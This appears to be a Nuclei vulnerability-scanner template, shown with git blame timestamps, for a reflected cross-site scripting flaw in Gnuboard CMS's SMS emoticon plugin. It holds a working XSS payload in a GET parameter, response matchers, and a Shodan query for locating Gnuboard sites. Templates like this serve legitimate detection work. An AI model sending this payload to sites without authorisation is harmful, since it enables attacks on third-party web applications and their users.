2022-05-10 04:22:31 +00:00
|
|
|
id: gnuboard-sms-xss
|
|
|
|
|
|
|
|
info:
|
2022-09-09 17:34:37 +00:00
|
|
|
name: Gnuboard CMS - SMS Emoticon Cross-Site Scripting
|
2022-05-10 04:22:31 +00:00
|
|
|
author: gy741
|
|
|
|
severity: medium
|
|
|
|
description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
|
|
|
|
reference:
|
|
|
|
- https://sir.kr/g5_pds/4788?page=5
|
|
|
|
- https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
|
2022-05-12 19:41:32 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
shodan-query: http.html:"Gnuboard"
|
2022-05-10 04:22:31 +00:00
|
|
|
tags: xss,gnuboard
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2022-05-12 19:41:32 +00:00
|
|
|
- "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
|
2022-05-10 04:22:31 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
2022-05-12 19:41:32 +00:00
|
|
|
words:
|
|
|
|
- '"0nuboard<svg onload=alert(document.domain)>"'
|
2022-05-10 04:22:31 +00:00
|
|
|
|
|
|
|
- type: word
|
2022-05-12 19:41:32 +00:00
|
|
|
part: header
|
2022-05-10 04:22:31 +00:00
|
|
|
words:
|
|
|
|
- "text/html"
|
2022-05-12 19:41:32 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|